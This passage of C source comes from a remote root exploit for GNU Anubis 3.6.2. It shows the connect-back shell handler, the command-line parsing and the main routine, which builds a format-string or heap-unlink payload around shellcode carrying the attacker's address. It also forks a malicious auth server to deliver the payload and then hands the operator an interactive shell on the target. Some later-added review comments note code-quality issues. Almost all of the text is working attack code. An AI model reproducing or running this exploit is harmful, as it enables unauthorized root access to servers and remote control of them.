u_int addrlen = sizeof(struct sockaddr_in);
struct sockaddr_in client;
int csock;
fd_set readset;
ssize_t n;
int nfd;
if (listen(lsock, 1) < 0) {
perror("** listen()");
return(-1);
}
/* Timeout */
signal(SIGALRM, signal_handler);
alarm(5);
/* Signal connect */
kill(conn, SIGUSR1);
waitpid(conn, NULL, 0);
printf("[*] Awaiting connect back\n");
if ( (csock = accept(lsock, (struct sockaddr *)&client,
&addrlen)) < 0) {
fprintf(stderr, "** Connection error\n");
return(-1);
}
alarm(0);
printf("[*] Target connected back\n\n");
wait(NULL); /* Reap of last child */
write(csock, "id\n", 3);
if ( (nfd = csock +1) > FD_SETSIZE) {
fprintf(stderr, "** SASH Error: FD_SETSIZE to small!\r\n");
return(1);
}
FD_ZERO(&readset);
FD_SET(csock, &readset);
FD_SET(STDIN_FILENO, &readset);
for (;;) {
fd_set readtmp;
memcpy(&readtmp, &readset, sizeof(readtmp));
memset(inbuf, 0x00, sizeof(inbuf));
if (select(nfd, &readtmp, NULL, NULL, NULL) < 0) {
if (errno == EINTR)
continue;
perror("select()");
return(1);
}
if (FD_ISSET(STDIN_FILENO, &readtmp)) {
if ( (n = read(STDOUT_FILENO, inbuf, sizeof(inbuf))) < 0) {
perror("read()");
break;
}
if (n == 0) break;
if (write(csock, inbuf, n) != n) {
perror("write()");
return(1);
}
}
if (FD_ISSET(csock, &readtmp)) {
if ( (n = read(csock, inbuf, sizeof(inbuf))) < 0) {
perror("read()");
break;
}
if (n == 0) break;
if (write(STDOUT_FILENO, inbuf, n) != n) {
perror("write()");
return(1);
}
}
}
return(0);
}
/*
 * Print the command-line synopsis, the table of known targets
 * (index and description, up to the NULL-terminated end of `targets`),
 * and the accepted options to stdout.
 *
 * pname: program name as given in argv[0]; used only in the synopsis line.
 */
void
usage(char *pname)
{
    int idx = 0;

    printf("\nUsage: %s host[:port] targetID [Option(s)]\n", pname);
    printf("\n Targets:\n");
    /* `targets` is the file-scope table terminated by a NULL desc. */
    while (targets[idx].desc != NULL) {
        printf(" %d - %s\n", idx, targets[idx].desc);
        idx++;
    }
    printf("\n Options:\n");
    printf(" -b ip[:port] - Local connect back address\n");
    printf(" -l retloc - Override target retloc\n");
    printf(" -r ret - Override target ret\n");
    printf(" -w written - Bytes written by target fmt func\n");
    printf("\n");
}
/*
 * Entry point.  Parses "host[:port] targetID [options]", fills `buf`
 * with the "a: USERID: a: ..." payload selected by the target type,
 * then forks two children: pid1 runs evil_auth() on auth_port and pid2
 * connects to the target, while the parent waits for the connect-back
 * on `lsock` via get_connectback().  Never returns; terminates through
 * exit() with EXIT_FAILURE on any setup error and EXIT_SUCCESS otherwise.
 *
 * BUFSIZE, ANUBIS_PORT, AUTH_PORT, PORT_INDEX, IP_INDEX, JMPCODE, FMTSTR,
 * the `targets` table, the start_auth/connect_target flags and the
 * helper functions are defined earlier in the file, outside this view.
 */
int
main(int argc, char *argv[])
{
u_char buf[BUFSIZE+1];
u_char fmt[220];
char *chunk = NULL;
struct sockaddr_in taddr;
struct sockaddr_in laddr;
u_short auth_port;
struct target *tgt;
pid_t pid1, pid2;
u_int ret = 0;
int lsock;
char *pt;
int i;
printf("\n GNU Anubis 3.6.2 remote root exploit by CMN\n");
if (argc < 3) {
usage(argv[0]);
exit(EXIT_FAILURE);
}
printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
/* Target defaults to ANUBIS_PORT; the address is filled in from argv[1] below. */
memset(&taddr, 0x00, sizeof(struct sockaddr_in));
taddr.sin_port = htons(ANUBIS_PORT);
taddr.sin_family = AF_INET;
taddr.sin_addr.s_addr = INADDR_ANY;
auth_port = htons(AUTH_PORT);
/* Local listener: ephemeral port (sin_port = 0) on net_localip(), unless -b overrides it. */
memset(&laddr, 0x00, sizeof(struct sockaddr_in));
laddr.sin_family = AF_INET;
laddr.sin_port = 0;
laddr.sin_addr.s_addr = net_localip();
/* Optional ":port" suffix on the host argument; splits argv[1] in place. */
if ( (pt = strchr(argv[1], ':'))) {
*pt++ = '\0';
taddr.sin_port = htons((u_short)strtoul(pt, NULL, 0));
}
/* NOTE(review): assumes net_inetaddr() returns (u_int)-1 on failure — confirm against its definition. */
if ( (long)(taddr.sin_addr.s_addr = net_inetaddr(argv[1])) == -1) {
fprintf(stderr, "Failed to resolve target host/IP\"%s\"\n",
argv[1]);
exit(EXIT_FAILURE);
}
argv++;
argc--;
/*
 * Target index: strtoul's unsigned result is stored in an int, so the
 * (i<0) test only fires if the value wrapped; the upper bound excludes
 * the NULL sentinel entry at the end of `targets`.
 */
i = strtoul(argv[1], NULL, 0);
if (argv[1][0] == '-'|| (i<0) ||
i>= sizeof(targets)/sizeof(struct target)-1) {
fprintf(stderr, "** Bad target ID\n");
exit(EXIT_FAILURE);
}
argv++;
argc--;
tgt = &targets[i];
/* Options; -l and -w patch the selected target entry in place. */
while ( (i = getopt(argc, argv, "r:l:w:b:")) != -1) {
switch(i) {
case 'b': {
if ( (pt = strchr(optarg, ':'))) {
*pt++ = '\0';
laddr.sin_port = htons((u_short)strtoul(optarg,
NULL, 0));
}
if ( (long)(laddr.sin_addr.s_addr = net_inetaddr(optarg))
== -1) {
fprintf(stderr, "Failed to resolve target host/IP
\"%s\"\n", optarg);
exit(EXIT_FAILURE);
}
}
/* No break above: case 'b' falls through into case 'r'. */
case 'r': ret = strtoul(optarg, NULL, 0); break;
case 'l': tgt->retloc = strtoul(optarg, NULL, 0); break;
case 'w': tgt->written = strtoul(optarg, NULL, 0); break;
default: exit(EXIT_FAILURE);
}
}
/* Local address */
if ( (lsock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("** socket()");
exit(EXIT_FAILURE);
}
if (bind(lsock, (struct sockaddr *)&laddr, sizeof(laddr)) < 0) {
perror("** bind()");
exit(EXIT_FAILURE);
}
/* Connect back address */
{
/* getsockname() expects socklen_t *; `int len` relies on the two types having the same width here. */
int len = sizeof(struct sockaddr_in);
struct sockaddr_in paddr;
if (getsockname(lsock, (struct sockaddr *)&paddr, &len) < 0) {
perror("** getsockname()");
exit(EXIT_FAILURE);
}
/* Bound port and address are written into tgt->code at PORT_INDEX / IP_INDEX (unaligned stores through casts). */
(*(u_short *)&tgt->code[PORT_INDEX]) = paddr.sin_port;
(*(u_int *)&tgt->code[IP_INDEX]) = paddr.sin_addr.s_addr;
printf("local addr: %s:%u\n", inet_ntoa(paddr.sin_addr),
ntohs(paddr.sin_port));
/* Rejects zero bytes in the patched values; note the port test repeats the 0xff00 mask. */
if (!(paddr.sin_port & 0xff00) || !(paddr.sin_port & 0xff00) ||
!(paddr.sin_addr.s_addr & 0xff000000) ||
!(paddr.sin_addr.s_addr & 0x00ff0000) ||
!(paddr.sin_addr.s_addr & 0x0000ff00) ||
!(paddr.sin_addr.s_addr & 0x000000ff)) {
fprintf(stderr, "** Zero byte(s) in connect back address\n");
exit(EXIT_FAILURE);
}
}
/*
 * We insert a '\n' to control the size of the data
 * passed on the the vulnerable function.
 * But all 512 bytes are read into a static buffer, so we
 * just add the shellcode after '\n' to store it.
 */
/*
 * Both branches fill buf with 0x90, copy tgt->code (plus its NUL) near
 * the end, then overwrite the head with snprintf().  NOTE(review):
 * snprintf() returns the length that would have been written; if that
 * is >= sizeof(buf), buf[i] below indexes past the array — confirm the
 * inputs keep i inside bounds.  buf is u_char[], so the snprintf/strlen
 * calls will draw sign-of-char warnings.
 */
if (tgt->type == FMTSTR) {
if (!ret)
ret = tgt->bufaddr+260;
if (mkfmtstr(tgt, ret, fmt, sizeof(fmt)) < 0)
exit(EXIT_FAILURE);
memset(buf, 0x90, sizeof(buf));
memcpy(&buf[BUFSIZE-strlen(tgt->code)-4],
tgt->code, strlen(tgt->code)+1);
i = snprintf(buf, sizeof(buf), "a: USERID: a: %s\n", fmt);
/* Replace snprintf's terminator so the rest of buf stays contiguous. */
if (buf[i] == '\0') buf[i] = 0x90;
}
else {
if (!ret)
ret = tgt->bufaddr+tgt->offset+24;
memset(buf, 0x90, sizeof(buf));
memcpy(&buf[sizeof(buf)-strlen(tgt->code)-4],
tgt->code, strlen(tgt->code)+1);
/* NOTE(review): `chunk` is heap-allocated by unlinkchunk() (presumably) and never freed — process exits shortly after. */
if ( (chunk = unlinkchunk(ret, tgt->retloc, 64/4)) == NULL)
exit(EXIT_FAILURE);
i = snprintf(buf, sizeof(buf), "a: USERID: a: %s", chunk);
if (buf[i] == '\0') buf[i] = 0x90;
/* Set free address */
*((u_int *)&buf[tgt->offset]) = tgt->bufaddr + 68;
/* Return point */
memcpy(&buf[(tgt->offset+24)], JMPCODE, sizeof(JMPCODE)-1);
buf[tgt->offset+4] = '\n';
}
printf(" Target: %s\n", tgt->desc);
printf(" Return: 0x%08x\n", ret);
printf(" Retloc: 0x%08x\n", tgt->retloc);
if (tgt->type == FMTSTR) {
printf(" offset: %u bytes%s\n", tgt->offset,
tgt->offset==1?"s":"");
printf(" Padding: %u byte%s\n", tgt->pad,
tgt->pad==1?"s":"");
printf(" Written: %u byte%s\n", tgt->written,
tgt->written==1?"s":"");
}
printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n");
/* ret and retloc are checked for embedded zero bytes only after the payload was built above. */
if (!(ret & 0xff000000) ||
!(ret & 0x00ff0000) ||
!(ret & 0x0000ff00) ||
!(ret & 0x000000ff)) {
fprintf(stderr, "** Zero byte(s) in return address\n");
exit(EXIT_FAILURE);
}
if (!(tgt->retloc & 0xff000000) ||
!(tgt->retloc & 0x00ff0000) ||
!(tgt->retloc & 0x0000ff00) ||
!(tgt->retloc & 0x000000ff)) {
fprintf(stderr, "** Zero byte(s) in retloc\n");
exit(EXIT_FAILURE);
}
/*
 * Process orchestration via SIGUSR1: pid1 signals the parent once it
 * is up, then both it and the parent spin on start_auth; pid2 spins on
 * connect_target, which get_connectback() raises.  NOTE(review): the
 * spin loops assume start_auth/connect_target are volatile sig_atomic_t
 * set by signal_handler() — confirm; a non-volatile flag lets the
 * compiler hoist the load out of the loop.
 */
signal(SIGUSR1, signal_handler);
if ( (pid1 = fork()) < 0) {
perror("** fork()");
exit(EXIT_FAILURE);
}
/* Auth server */
if (pid1 == 0) {
kill(getppid(), SIGUSR1);
signal(SIGUSR1, signal_handler);
while (!start_auth);
/* strlen() on the 0x90-filled u_char buf stops at the NUL left after tgt->code. */
if (evil_auth(auth_port, buf, strlen(buf)) != 0)
kill(getppid(), SIGTERM);
exit(EXIT_SUCCESS);
}
if ( (pid2 = fork()) < 0) {
perror("** fork()");
kill(pid1, SIGTERM);
exit(EXIT_FAILURE);
}
/* Connect to trigger */
if (pid2 == 0) {
int anubis_sock;
signal(SIGUSR1, signal_handler);
while (!connect_target);
/* anubis_sock is never closed explicitly; exit() releases it. */
if ( (anubis_sock = sock_connect(taddr.sin_addr.s_addr,
taddr.sin_port)) < 0) {
exit(EXIT_FAILURE);
}
exit(EXIT_SUCCESS);
}
/* Start auth */
while(!start_auth);
kill(pid1, SIGUSR1);
/* kill(0, SIGTERM) signals every process in this process group, children included. */
if (get_connectback(pid2, lsock) < 0) {
kill(0, SIGTERM);
exit(EXIT_FAILURE);
}
exit(EXIT_SUCCESS);
}